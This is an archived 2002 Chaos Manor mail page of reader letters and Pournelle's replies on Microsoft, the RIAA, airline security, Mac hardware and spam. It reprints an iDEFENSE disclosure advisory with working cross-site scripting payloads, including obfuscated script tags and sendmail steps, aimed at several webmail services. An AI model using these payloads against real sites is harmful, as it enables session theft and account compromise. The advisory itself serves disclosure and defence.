jp.jpg (13389 bytes)

CHAOS MANOR MAIL

Mail 219 August 19 - 25, 2002

 

HOME

VIEW

MAIL

Columns

BOOK Reviews

read book now

emailblimp.gif (23130 bytes)mailto:jerryp@jerrypournelle.com

CLICK ON THE BLIMP TO SEND MAIL TO ME

 

LAST WEEK                          Current Mail                           NEXT WEEK

  The current page will always have the name currentmail.html and may be bookmarked. For previous weeks, go to the MAIL HOME PAGE.

FOR THE CURRENT VIEW PAGE CLICK HERE

If you are not paying for this place, click here...

Highlights this week:

IF YOU SEND MAIL it may be published; if you want it private SAY SO AT THE TOP of the mail. I try to respect confidences, but there is only me, and this is Chaos Manor. If you want a mail address other than the one from which you sent the mail to appear, PUT THAT AT THE END OF THE LETTER as a signature. In general, put the name you want at the end of the letter: if you put no address there none will be posted, but I do want some kind of name, or explicitly to say (name withheld).

Note that if you don't put a name in the bottom of the letter I have to get one from the header. This takes time I don't have, and may end up with a name and address you didn't want on the letter. Do us both a favor: sign your letters to me with the name and address (or no address) as you want them posted.

I try to answer mail, but mostly I can't get to all of it. I read it all, although not always the instant it comes in. I do have books to write too...  I am reminded of H. P. Lovecraft who slowly starved to death while answering fan mail. 

Day-by-day...
Monday -- Tuesday -- Wednesday -- Thursday -- Friday -- Saturday -- Sunday

 Search engine:

 

or the freefind search

 
   Search this site or the web        powered by FreeFind
 
  Site search Web search

read book now

Boiler Plate:

If you want to PAY FOR THIS PLACE I keep the latest information HERE.  MY THANKS to all of you who sent money.  Some of you went to a lot of trouble to send money from overseas. Thank you! There are also some new payment methods. I am preparing a special (electronic) mailing to all those who paid: there will be a couple of these. I have thought about a subscriber section of the page. LET ME KNOW your thoughts.
.

If you subscribed:

atom.gif (1053 bytes) CLICK HERE for a Special Request.

If you didn't and haven't, why not?

If this seems a lot about paying think of it as the Subscription Drive Nag. You'll see more.

Search: type in string and press return.

 

line6.gif (917 bytes)

read book now If you contemplate sending me mail, see the INSTRUCTIONS here and here.

Warning!

 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Monday  August 19, 2002

Thompson on the TrueType "abuse:"

According to Microsoft, "the downloads were being abused -- repackaged, modified and shipped with commercial products in violation of the EULA." I think we all concede their right to object to that, because the fonts were free-as-in-beer, not free-as-in-speech. It seems to me that a more reasonable course would have been to leave the fonts available for download and send a nastygram to whichever companies were repackaging them or shipping them with commercial products in violation of the EULA, but then I'm not Microsoft.

I see that Microsoft has made no attempt to prevent other sites from posting those fonts, so long as they are posted in their original form. That right was granted under the original license, and Microsoft seems not to be trying to backpedal on it.

I don't much care for many of Microsoft's business practices, but it seems to me that they're within their rights here.

-- Robert Bruce Thompson thompson@ttgnet.com http://www.ttgnet.com <http://www.ttgnet.com>

And Roland comments:

I agree that they're within their rights - I just think it petty of them. A more nuanced approach, such as the one Thompson suggests, would be preferable.

Roland Dobbins

And I agree.

For bittersweet try:

A small visual effects studio in Australia has been doing an alternate-reality documentary for awhile now.

"This film is based on an alternative timeline to the Mercury-Gemini-Apollo era of reality - it is based on the premise that all that had been proposed in the early 1950's in Colliers actually came to pass - and sooner than they expected."

http://www.users.bigpond.net.au/
surfacesrendered/MCSHomepage.html
 

And while we're looking at SF and Art on the Internet, have a look at http://www.e-sheep.com/spiders/  parts 1,2 and 3 (so far).

I'm no fan of e-comix, but this one manages to contain at least one good and original SF story. Thought-provoking too.

Regards, Alan E Brain, Canberra, Australia.

It may be that Kennedy's leap to the Moon was the wrong way to go. Of course I didn't think so at the time... John Pierce used to wonder if we wouldn't have been better off building sub-orbital re-usables and working our way up to orbit rather than designing disintegrating totem poles...

And Keith Langill says

So, for no good reason, I dragged my feet moving to Opera. You talked me into it today. ZOIKS! It's fast, baby! WAY FAST. Now I feel mildly stupid. Oh well.

-k

I'm still sort of stuck with IE but I won't be for too long. 


From: Stephen M. St. Onge saintonge@hotmail.com

subject: Artificial vision

Dear Jerry:

An interesting story from "Wired": apparently we're on the verge of artificial vision. WOW!

http://www.wired.com/wired/archive/10.09/vision_pr.html 

Best, Stephen

We've been on that verge for a long long time...

And Roland reminds me that I used to do a lot with HyperCard -- the Mac  version of Roberta's reading instruction program -- if you need to teach someone age 4 and up to read English this will do it. -- was written in SuperCard which was a kind of HyperCard. HyperCard was one of the really great programming languages and one reason Apple was so useful. So of course Apple pretty well abandoned it. it's still out there, though.

Of course it won't work with the new Mac OS. At least not yet.

http://www.wired.com/news/mac/0,2125,54365,00.html 

But it is one great language. Simple to use. There were going to be Windows versions of HyperCard and I eagerly waited for them, but if one ever happened I missed its coming out. Pity again, because a SuperCard for Windows (SuperCard included sound, and could hand a phrase to the Mac's wonderful text to speech engine) would have been a really useful thing.

I suppose Visual Basic ate up the SuperCard for Windows but I wish it hadn't.

And about when you think RIAA can't go crazier, they do.

I note that you read and responded to my email about the RIAA lawsuit. Thanks.

I think the RIAA has started believing their own propaganda. It is one thing to bully individual artists, or threaten to launch hacker attacks against small fry on the internet. It is another thing entirely to launch ill-considered attacks against multi-national companies as big or bigger than they are. Even if politicians do come cheap, they should remember that their targets also have deep pockets.

Suppose whoever inherits UUNET were to go to Sony and Time Warner and tell them, "Sorry, but our lawyers tell us we are no longer allowed to maintain business dealings with companies that are in the process of litigation against us. So until this lawsuit is settled, we are not going to allow our routers to be used to access any of your web sites." That might be a bit more inconvenient than a DoS attack.

I have posted a call for a boycott of the RIAA on my web site at http://theforge.smithwrite.com in case you have any interest. Regardless, I appreciate your efforts in maintaining a useful and thought provoking web page.

Barry Smith

Well I doubt a boycott would work, and indeed that's probably counter productive. But perhaps not. Me, I do not intend to be deprived of Lord of The Rings.

And Mother India, that gentle home of non-violence, makes the news in an odd way:

Holy Cow a Myth? An Indian Finds the Kick Is Real NYT August 17, 2002 By EMILY EAKIN

"Holy Cow: Beef in Indian Dietary Traditions," is a dry work of historiography buttressed by a 24-page bibliography and hundreds of footnotes citing ancient Sanskrit texts. It's the sort of book, in other words, that typically is read by a handful of specialists and winds up forgotten on a library shelf.

But when its author, Dwijendra Narayan Jha, a historian at the University of Delhi, tried to publish the book in India a year ago, he unleashed a furor of a kind not seen there since 1989, when the release of "Satanic Verses," Salman Rushdie's novel satirizing Islam, provoked rioting and earned him a fatwa from Ayatollah Ruhollah Khomeini.

As Mr. Jha's book was going to press last August, excerpts were posted on the Internet and picked up by newspapers. Within days the book had been canceled by Mr. Jha's academic publisher, burned outside his home by religious activists and - after a second publisher tried to print it - banned by a Hyderabad civil court. A spokesman for the World Hindu Council called it "sheer blasphemy." A former member of Parliament petitioned the government for Mr. Jha's arrest. Anonymous callers made death threats. And for 10 months Mr. Jha was obliged to travel to and from campus under police escort.

<snip>

Indeed....

Roland is reminded of the old Tom Lehrer song about "He gives the kids free samples, because he knows full well..."

The first taste is always free - until they're hooked.

http://www.nola.com/news/t-p/neworleans
/index.ssf?/newsstory/o_microsoft16.html
 

The following is long, and involves a security warning that probably doesn't apply to you; but if it does, it might be important. Roland forwarded it, and I forwarded it along to subscribers, again on the theory that it probably wasn't relevant, but it might be. To skip it, click here.

From: David Endler <dendler@idefense.com> To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com Subject: [Full-Disclosure] iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications Date: 19 Aug 2002 08:39:49 -0400

iDEFENSE Security Advisory 08.19.2002 Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications

Yahoo Mail http://mail.yahoo.com Netscape Mail http://webmail.netscape.com AOL Webmail http://webmail.aol.com (same as Netscape Mail) Excite Mail http://mail.excite.com eBay Chat http://pages.ebay.com/community/chat/index.html

DESCRIPTION

Many Web Applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." Web Applications not meticulously filtering this untrusted content before presenting the web page to the user may allow for the manipulation of the web page and its content interpretation by a web browser.

This issue becomes dangerous when untrusted content is able to be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a users browser with the exact same privileges of the ligitimate web server.

Some Web Applications such as Yahoo Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated content may elude the current filters and execute within the users browser environment.

Allowing the attacker to target users almost instantly without relying on the user performing any activities other than normal usage. All vulnerabilties affect either Microsoft Internet Explorer Browser or Netscape or both. These types of XSS vulnerabilities are usually classified as "constant- state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are detailed in an iDEFENSE paper available at http://www.idefense.com/XSS.html.

ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Response, this issue in Yahoo has since been addressed):

bash$ sendmail -t target@yahoo.com

Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attacker@foo.com> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>

</BODY></HTML> . --------------------------------------------------

*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

bash$ sendmail -t target@netscape.net

Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attacker@foo.com> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML> . --------------------------------------------------

*** Excite Webmail ***

It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@excite.com

Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attacker@foo.com> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML> . --------------------------------------------------

*** eBay Chat ***

While you are logged in as an eBay user, place the text sting below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------ <IMG SRC="javasc&#X0A;ript:alert(document.domain);"> ----------------------------------------------------

DISCOVERY CREDIT

Jeremiah Grossman (jeremiah@whitehatsec.com) Lex Arquette (lex@whitehatsec.com)

VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr@yahoo-inc.com), title "Paranoid Yahoo", responded and issue was fixed.

DISCLOSURE TIMELINE

June 27, 2002 Exclusively Disclosed to iDEFENSE July 16, 2002 Ebay, AOL/Netscape, Yahoo, and Excite notified July 16, 2002 iDEFENSE Client Disclosure August 11, 2002 Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems August 19, 2002 Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure

http://www.idefense.com/contributor.html

David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071

dendler@idefense.com www.idefense.com

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ------------------------------------------------------------

 

END

Suicide of the West

James Burnham said that liberalism is a philosophy of consolation for western civilization as it commits suicide. Apparently he was right. This from Roland:

No, this isn't the Onion.

http://www.sky.com/skynews/article/0,,30000-12090008,00.html 

I suppose nobody in Mr. Blair's Government remembers WPC Yvonne Fletcher, shot to death by agents of this same man, whose minions later blew up an airliner over Lockerbie?

Then we have:

Dear Sir,

I am an Uruk of Mordor, charged with the discovery of a number of valuable treasures within Moria. It has come to my notice that the mithril hoard previously owned by Ori of the land of Moria has been found by one of our cave-trolls. Under our laws, the hoard will be shared between our lord Sauron and the local Balrog, but so far neither knows the extent of the treasure.

Sir, I come to you as a respectful businessperson in order that we may derive some profit ourselves from this venture, I would wish that I could arrange for the transfer of half of the find to yourself, costing roughly 20,000 silver pennies. From this amount, I will then arrange for a further such that 25% remains your own, 5% goes for sundry costs (including hire of strong Rohan horses for use in transportation), 5% is given in bribe to the cave troll to ensure the quantity reported to our respective Lords is adjusted, 65% belongs to myself and my fellow Orcs.

In order that this be accomplished, I ask only that you provide details of:

Your willingness to participate in this venture,

Confirmation that you will not speak of this venture to anyone else, or wear any magic rings,

Your race and land of residence,

The location of your local Palantir or identity of your preferred message-carrying bird or beast,

Your given name, and any name you are known by in the Western lands,

The number of ponies you possess.

I look forward to your returning correspondence, which can be whispered to any passing magpie. I trust that you will ensure that no other dark feathered birds come to hear of this transaction.

Heh

 

 

 

TOP

CURRENT VIEW 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Tuesday,  August 20, 2002

See VIEW for why I'm still around today.

RE : Petty Tyrants

Jerry

You are wrong you know. The only security rules that are worth having are ones that are simple for everyone to understand.

"You are not allowed anything that is or looks like a gun" is simple and requires very little thought by the agent who is making these decisions thousands of times an hour.

The alternative, which goes something like "You are not allowed anything that is actually a gun" is open to interpretation and argument. This is a massive workload for the agent and therefore mistakes will be made.

Also - this is not a freedom issue, since all they had to do was put the doll in the hold luggage!

Paul

In other words, the purpose of airline security systems, which is to make airlines safer without closing them down, is unimportant: what's important is security. Grounding the airplanes forever will do that with no discretionary authority given the guards. Just close the airlines down.

If that's too drastic, how about body cavity searches for everyone? That would also make the airplanes secure. No one would fly on them of course.

Which is the point: the more silly things that are done, the less confidence passengers have. Confiscating a 4 inch plastic rifle replica doesn't make the airplane more secure, but it does make the passengers think the security system is a joke. Perhaps that wasn't the intended result, but it's the prudentially expected outcome, which is to say, it was intended assuming that you require someone to have more sense than a turnip to be in those Federal Agent jobs. Taking away discretion -- zero tolerance -- never works.

As to why to what freedoms to give up in order to fly, once again, if you start with the premise that the state is right and people are wrong you can come up with a lot of them.  Me, I wouldn't mind having GI JOE in checked luggage if that were easy to do; but I'd rather require that every active duty firearms qualified officer  and sergeant of the United States be required to carry a concealed firearm with suitable ammunition on every flight....

Joe Zeff looks at another liberty issue:

Florida's found a new way to harass women and invade their privacy: make unwed mothers advertise publicly for possible fathers: http://www.abcnews.go.com/sections/us/
DailyNews/fathersrights020820.html?partner=earthlink
  How this got passed so easily I don't understand, unless it was rushed through at the last minute to stifle dissent. We all know that politicians in general are all in favor of Free Speech supporting them, but oppose Free Speech if the words disagree with their position. They say that any challenge would have to reach the State Supreme Court, but I suspect that the aptly named SCOFLA would ask not what is right or wrong, but what the Democratic Party wants.

I suppose there are arguments in favor of something like this, though: it would run "The taxpayers are being asked to provide the money that the father ought to be paying. Therefore we are justified in trying to find the guy to stick him with the bill for his fun and games."

That doesn't mean I would vote for any such law; and of course if the woman isn't after state support, that's another story. And in fact I see this is an adoption law. Which makes it really odd. From the story:

Not everyone sees an anachronistic injustice here — fathers' rights groups say the Florida adoption law, which is garnering national attention, is a welcome attempt to secure paternal privileges in a legal and political system that they say generally sees mothers' needs and wishes as paramount.

"How can these dads know they have children when they have no notice that they are fathers," said Jeffery M. Leving, a Chicago attorney who specializes in fathers' rights.

Which isn't all that powerful an argument: in an era of hooking up, who's to know? Clarke thought that absolute identification methods (DNA) and foolproof contraception would end marriage as we know it and change society. (Childhood's End)  Of course so did Trotsky.

 

Abu Nidal is dead of one or more gunshot wounds, in Baghdad.

Iraq says he suicided when confronted by Iraqi officials with evidence that he was conspiring with Kuwait to oust the Saddam regime. http://www.cnn.com/2002/WORLD/meast
/08/20/jordan.otsc/index.html
 

A newspaper in Palestine says Nidal had suffered from leukemia for years and that simple depression and suicide are what killed him. http://www.cnn.com/2002/WORLD/
meast/08/19/mideast.nidal/index.html
 

There are rumors of "multiple gunshot wounds to the abdomen", which makes suicide unlikely if the rumors are true.

He won't be missed much, regardless of who gets credit.

Steve Setzer

And you may even see the fine hand of the Company here. The fox sometimes leaves tracks, although, as in Indonesia they are sometimes well concealed.

Roland finds a story he calls "Fighting back"

http://www.informationwave.net/news/20020819riaa.php 

and I suppose it is. Also from Roland

Shields up!

http://www.washtimes.com/world/20020820-86081662.htm 

and we also have

Jerry,

This is quite interesting if true.

http://www.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2
F2002%2F08%2F19%2Fnmod19.xml
 

Regards,

Craig Arnold

Interesting indeed.

Dear Dr. Pournelle:

I read in your Byte column that you use POPUP Stopper, but have to disable it when sites use legitimate pop-up windows. I tried both POPUP Stopper and PopUpCop and found 'Cop so useful I paid $20 for the full version. The difference between the two is that PopUpCop allows legitimate pop-up windows to appear yet it stops the annoying ads. The trial version - at popupcop.com - has a 30-day limit, but it becomes indefinitely functional when you register.

-- Pete

I suppose I should look into this, but it's really no problem turning off Stopper in the few cases when I need it off...

 

 

 

g

 

TOP

CURRENT VIEW 

 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Wednesday,

 

Travelling

 

 

 

TOP

CURRENT VIEW 

 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Thursday, August 22, 2002

Short shrift

What do you know, a nationally syndicated columnist who reads (and cites!) Mr. Heinlein. http://www.townhall.com/columnists/rossmackenzie/rm20020822.shtml  Hmmm, according to his bio, he has two sons who are naval officers. Cause or effect I wonder?

Greg Hemsath

I only have one boy in the Navy.

Hi Jerry

From reading your pages, it is obvious that you like spam about as much as I do -i.e. not much.

It seems to me that eliminating spam would not be hard to do, but it would involve that bugbear of modern society personal responsibility.

1. First thing to do is come up with a workable definition of spam - this may be the hardest step.

2. Second, we make spam illegal and designate suitable dire punishments.

3. Now here's the unpopular bit: we make every computer owner personally responsible for their computer and for who connects to it. If you give somebody access to your computer, you had better know who they are - and be able to prove it.

4. Now if I receive spam from your computer, the default assumption is that it is your fault. It is up to you to then prove that it came from somewhere else. If you cannot prove that it came from elsewhere, you are negligent and will be penalised (fines or whatever). I can be sure that after you receive such a fine, you will become much more diligent in controlling who connects to your computer. If it came from a broadband customer who was "owned" by a hacker, well the customer is responsible - s/he should have installed proper security. If they are a home user, there may be some liability on the ISP for not explaining security to their customer.

However you see where it is going. Spammers can only succeed if some internet connection is made available to them, either by a sympathetic or careless computer owner.

If the spam entered a backbone via a feed from another country, then the owner of that feed is responsible, unless s/he can identify the source further upstream.

Everybody complains about spam, but nobody wants to take the hard decisions.

That's my plan for solving the problem. I don't hold high hopes of anybody adopting it.

Aurema don't even know that I have opinions, let alone what they are. They certainly do not authorise my comments above.

------------------------------------------------------------------- Michael Smith, Senior Software Engineer 

=====

Jerry

From your column:

>My one real complaint is that some critical information comes up in really >tiny print—even on my 21" >screen I have to get close and use reading lenses

I assume that you're using IE - if so there's a very quick solution to this one. Click on View -> Text Size and make the text larger. Change it back as easily - this is also a quick solution for several users on one system. If you're already using it at that setting, then you need to change your defaults.

On another topic - Microsoft. You used the phrase (in your last column, I think) "customer hostile policies" - which led me to think ...

I think that Microsoft now regards the public - including its customers, let alone other software companies, as "the enemy". Since everyone is - by the order of things - now a user of Microsoft Windows and Office, anyone who hasn't paid over the full licence fee is, by definition, criminal or in need of professional help. There are the disorganised (who haven't filled in their tax forms by the end of the year and haven't upgraded to the latest versions) the disabled (who use Apple) and the traitors (who use Linux) and the seriously educationally deprived (who may not have a computer) - the rest are trying to break the law which protects Microsoft. Microsoft no longer has to sell software - all they need to do is get a proper enforcement agency to make sure that MS get what nature and the rule of law have given them. A company at war has to hang on to every slight advantage they can get, and then paranoia becomes a useful strategy and (as your 4" rifle story shows) we live in paranoid times.

Philippa Sutton

People often confuse rules with the objective.

Roland finds the largest asteroid strike yet...

http://www.msnbc.com/news/797736.asp 

Wow. Then there's

Some animals are more transplantable than others.

http://news.bbc.co.uk/1/hi/sci/tech/2210306.stm 

And if you are a Microsoft Developer and use FTM, you need to see

http://www.theregus.com/content/4/26057.html 

 

 

 

TOP

 

CURRENT VIEW 

 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Friday, August 23, 2002

We have a whole slew of vulnerabilities;

Much more than DoS, description highly misleading; can possibly be exploited to run code of attacker's choice in a privileged context.

http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/security/bulletin/MS02-045.asp
 

On and on it goes . . .

http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/security/bulletin/MS02-047.asp
  

http://www.cnn.com/2002/TECH/internet/
08/23/microsoft.security.reut/index.html
 

http://www.theregus.com/content/55/26092.html 

------------------ Roland Dobbins

sigh.

Peter Glaskowsky on the Mac

Eric Pobirs wrote the following about the new PowerMac systems and was quoted in Mail 218:

> The oddnesses in the newly announced machines are more than minor. They > reflect serious desperation. Part of this is due to a critical supplier who > hasn't been able to keep up their end of the business (while their sole > desktop CPU customer's low market share makes it increasingly unreasonable to > try) and much of it is Apple's own fault for trying to keep too much in-house.

This makes no sense. What DOES make perfect sense is that there is far less money available for PowerPC CPU R&D than there is for Intel or AMD x86 processor R&D for some obvious reasons. Far fewer PowerMac computers are sold each year than those based on Intel and AMD processors. On top of that, Apple has a very different relationship with Motorola than PC OEMs have with Intel and AMD. Apple does some of the development work up front, and gets a price break on CPU unit costs later.

The result is that Motorola simply can't afford to put as much work into improving general-purpose integer and floating-point performance in the PowerPC family as Intel and AMD do. Instead, Motorola puts more work into boosting performance on certain functions that are especially important to Mac users, such as image and video processing.

And that's exactly the right thing to do. Few Mac users spend any significant amount of time waiting on the Microsoft Word spell checker. True, better integer performance would speed up C compilers and other socially rewarding programs. But when you've got limited resources, you have to allocate them to achieve the best possible return on the investment, and Motorola is doing that.

It's totally unfair to criticize Motorola for not being "able to keep up their end of the business." They're running their PowerPC business in a way that makes it profitable and sustainable, and I think Eric ought to ask himself if he could really do any better himself.

Apple, for its part, is doing an excellent job of system design using the components and technologies available to it. I see nothing to criticize there. Though again Apple has fewer resources available for system design than, say, Intel's core-logic division, Apple's chip sets are every bit the equal of anything on the PC platform.

Some people just seem to feel compelled to find fault with anything less than miraculous progress. These new PowerMacs have a new system architecture, unmatched performance on Photoshop and other apps, faster networking than any PC you can buy, and they run the best OS on the market. Sure, they have room for improvement. What doesn't?

> Lest I repeat the work of someone who already gone into much detail here is > some observation about the new Macs: > http://denbeste.nu/cd_log_entries/2002/08/Anunbelievablekludge.shtml   > I find little to disagree with in the Captain's notes.

That guy certainly is Clueless. He's already been obliged to add "updates" (that is, corrections, retractions, and apologies) that exceed the length of the original piece. He's even been forced to "update" the "updates".

Factually: No, the new PowerPC processors in these new PowerMacs are not "overclocked". No, the G5 has not been "cancelled". No, DDR-SDRAM does not have greater latency than conventional (single-data-rate) SDRAM. The guy clearly has no concept of what latency is, nor of how to analyze system technology. That's MY job, and I know when someone's faking it.

> Surely others notice > how incredibly strange it is for a company to forego a lower price point for > an entry level model by making dual processors the only shipping > configuration.

Uh, Earth to Eric: Apple sells a whole BUNCH of machines with just one processor. The PowerMac is sold almost exclusively to professionals. The dual-processor configuration of these machines reflects what these customers want.

> We can still hope that IBM doesn't take too long to get that new CPU out in > volume. Anyone interested in the future of PowerPC on the desktop will pay > close attention to the details divulged at the Microprocessor Forum in > October.

I should thank Eric for plugging our conference, and it's true that IBM will be disclosing a new 64-bit PowerPC processor based on the Power4 design at Microprocessor Forum, but just read the presentation description from our website ( http://www.mdronline.com/mpf/conf.html ):

. Breaking Through Compute Intensive Barriers - . IBM's New 64-bit PowerPC Microprocessor . Peter Sandon, Senior Processor Architect, Power PC Organization, . IBM Microelectronics . IBM is disclosing the technical details of a new 64-bit PowerPC . microprocessor designed for desktops and entry-level servers. Based . on the award winning Power4 design, this processor is an 8-way . superscalar design that fully supports Symmetric MultiProcessing. . The processor is further enhanced by a vector processing unit . implementing over 160 specialized vector instructions and implements . a system interface capable of up to 6.4GB/s.

I have to add here that I am not privy to Apple's product plans. I haven't heard a word about this chip from anyone at Apple, and IBM has never said or implied that Apple is one of their customers for this chip. I have NO idea if Apple will ever use it, never mind any specific information on which Mac systems would receive it, or when-- but new processors often take a long time to come to market. I don't expect to see this chip in a mainstream Mac anytime Real Soon Now.

. png

And from Joel Rosenberg;

"Rosenberg has become convinced that the FBI knows who sent out the anthrax letters, but isn't arresting him, because he has been involved in secret biological weapons research that the U.S. does not want revealed. "This guy knows too much, and knows things the U.S. isn't very anxious to publicize," Rosenberg said in an interview. "Therefore, they don't want to get too close."

"Does any of this make sense?"

Sure. It makes sense if either:

a: the authorities really believe that Hatfill is the anthrax mailer *and* would be able to reveal information in his defense that is, in the authorities' opinion, more dangerous than a few deaths from anthrax mailings, which the open tailing and close attention have put a stop to, anyway, (call it the Graymail Theory),

and/or

b: they've figured out that they've got another Richard Jewel on their hands -- having been misdirected by Barbara "no relation" Rosenberg, who appears to be an utter idiot -- and rather than come out and admit it, need a cover story, and if Hatfill's life is ruined, all the better. (the Waco Theory)

I'm betting on the Waco Theory, myself. I'm kind of surprised he hasn't had a kick-in-the-door search. Yet. Be convenient if he were to make a sudden move . . .

This has all the earmarks of the sort of ignorance and panic that sent the SS into Steve Jackson's offices to prevent cyberattacks by seizing copies of his Cyberpunk RPG (which, as you know but they didn't bother to find out, is about as useful as a handbook for hacking and cracking into computers as, say, The Magic Goes Away is for creating real death spells).

The level of incompetence of the Praetorians continues to amaze me.

 

 

And from Dave Colton:

Alneda.Net

was/is a prominent website front organization for Al Qaeda. You might be amused at what the web site says now: http://www.alneda.net

 

And that ought to be enough to think about for the evening...

 

 

;

 

 

 

 

TOP

CURRENT VIEW 

 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Saturday,

 

This story is disturbing less for it's content than Yahoo and US News & World Report listing it as a "Top Story." I used to think Robert Heinlein's descriptions of news reports in his "future history" stories were impossible satires. I guess I was too optimistic.

http://news.yahoo.com/news?tmpl=story2&u=/usnews/
20020817/ts_usnews/dark_side_of_the_moon_landing&e=1
 

James M. D. Wigderson Waukesha

Top Story. Indeed. Crazy Years...

 

 

TOP

 

CURRENT VIEW 

This week:

Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday

read book now

TOP

Sunday, August 25, 2002

Short shrift

Just my opinion; the latest ver (6.05, soon-to-be-7.0) of the Opera browser for Windows is almost THERE as a viable IE replacement. With all the alleged security shitte going on w/M$ nowadays I am hoping to be ~95% M$-free by years' end.

Anyways, Opera is really fast, noticeably faster than any other on Windows and absolutely screams on Linux. Much more skinable, MUCH more secure and, once you get used to it, just as easy to use and more versatile to boote.

Also, while nowhere near as intuitive (read easy-to-use) as Windows, Mandrake 8.2 has been running non-stop on a box here for 89 days w/o a reboot (can't say that 'bout WinXP). I'm gettin more comfortable and confident (competent?) w/it.

BTW, I am seriously thinking of gettin a new MAC w/the intent of trying out Jaguar. As you know {-:) it uses FreeBSD as the kernel, which means bullet-proof. It's new Quartz Extreme interface is very nice.

The pay ver of Opera (yes, they have a ver for the MAC) which eliminates the ad box, costs 10 bucks for students...

--------------------------------------------------------------------------------

It's a really hot summer everywhere, and water is more valuable than gasoline... And is the USA an Empire, or a Republic? Or something in between.

JV

====================

Jerry,

Maybe trivia, but the latest issue of Am. Heritage Invention & Technology has a cover story about that "indefinable something" that vacuum tubes offer to audio; borderline pseudoscience, but -- the glaring, embarrassing whopper is that the cover illustration, which the author and editors must have thought was a vacuum tube, is *not* a vacuum tube.

It doesn't even look like one! It's some sort of rare, museum-piece flashtube, with a coiled clear inner structure. Pretty picture, though; colored back light.

I wrote them, but haven't yet received a reply. Quarterly publications are probably on a relaxed schedule.

No reply needed.

Best,

Nicholas Bodley |*| Waltham, Mass. Opera browser fan -- Registered, too http://sincerechoice.org: A cause that I believe in.

Indeed

saf

This is Sunday August 25

I guess what concerns me most about the licensing info is that it is on a Service Pack. If they want to change the terms under which I initially purchase a piece of software, fine, but changing the terms when they issue a service pack seems unfair. If they offer modules for a package that I have licensed that offer added functionality, I guess they can impose any license they want, and I can forego those features if I don't like the terms; but service packs also include patches that make the functionality I originally licensed work correctly, so it's only right that I get them under the original license agreement, not whatever they decide to include when they finally get around to making their software work as it should have in the first place. We would be outraged if someone sold us a defective telephone, then offered us a "free" repair as long as we agreed that they could use it when/if they wanted to; we'd say that they should fix it without any additional impositions on us. Likewise MS.

My two cents. Your columns are generally worth considerably more--although I don't always agree with you, I always find well-thought-out positions in your columns, along with useful information. Thanks for the good work.

Kevin Ryan

Thanks for the kind words.

From Eric:

Office XP a lot cheaper than you may think

http://news.com.com/2100-1001-954779.html 

I'm surprised to realize that I'd completely missed this. In the past there would typically be a high price and a rebate based on qualification, as is still done with many upgrade purchases of major software titles. Instead you can buy the Student/Teacher version of Office XP for $100 to $130 and never be required to show proof of your academic status. If this stealth bargain package does well enough I wonder if they'll just come out in the open and drop the price of regular Office, eliminating price as one of the major advantages of Star Office.

I continue to use Office although Office XP with Windows XP turns out to be a pain. Office 2000 is mostly what I use. I'll do more testing of Office XP when i get back home: I want to see if it blows up Outlook if I install Front page 2000 from Office 2000 

I confess I am pretty unhappy with Windows and Office XP just now: the copy protection stuff gives THEM the security of annoying the customer, while leaving huge security holes...

I often get mail I don't understand. Here is one of them:

Jerry:

I'll let you in on a secret that millions of others already know. Oracle has a great technet http://otn.oracle.com/ . The best part of it's FREEEEEEEEEE !!!

Database - Free

Development Tools --- Free

Portal - Free

Wireless - Free

 

If you a developer you are entitled to use their software for a period of time in a development environment.

Time to move up to where the Big Boys are and get rid of the Toys.

Regards

Rich Konopka 

Why would he suppose I should get a letter like that? And is he correct?

On the Font situation:

